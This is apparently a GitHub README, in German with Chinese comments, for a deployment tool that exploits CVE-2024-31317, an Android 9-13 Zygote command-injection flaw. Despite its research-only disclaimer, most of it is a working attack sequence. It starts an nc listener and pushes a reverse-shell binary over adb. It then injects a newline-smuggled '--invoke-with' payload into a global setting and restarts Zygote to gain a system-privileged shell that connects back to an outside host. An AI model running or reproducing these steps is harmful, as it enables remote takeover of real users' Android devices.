
CVE-2024-31317 Forschungs- und Bereitstellungstool für die Android-Zygote-Befehlsinjektionsschwachstelle | Exploit-Framework für Android 9-13
Dieses Projekt dient ausschließlich Zwecken der Sicherheitsforschung und Bildung. Die Nutzung dieses Tools für unbefugte Tests ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.
CVE-2024-31317 ist eine schwerwiegende Sicherheitslücke, die Android-9- bis Android-13-Geräte betrifft und es Anwendungen mit der Berechtigung WRITE_SECURE_SETTINGS ermöglicht, durch Befehlsinjektion eine Ausführung mit Systemberechtigungen zu erlangen.
Dieses Projekt bietet eine detaillierte technische Analyse dieser Schwachstelle, Proof-of-Concept-Code sowie automatisierte Bereitstellungswerkzeuge.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# 启动监听器
nc -lvnp 4444
# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 触发漏洞
adb shell stop && adb shell start
Dieses Projekt dient ausschließlich der Sicherheitsforschung und Bildung. Mit der Nutzung dieses Tools erklären Sie sich damit einverstanden:
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei
fcy10012 – GitHub
Referenzprojekt: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Wenn Ihnen dieses Projekt hilft, geben Sie ihm bitte einen Stern!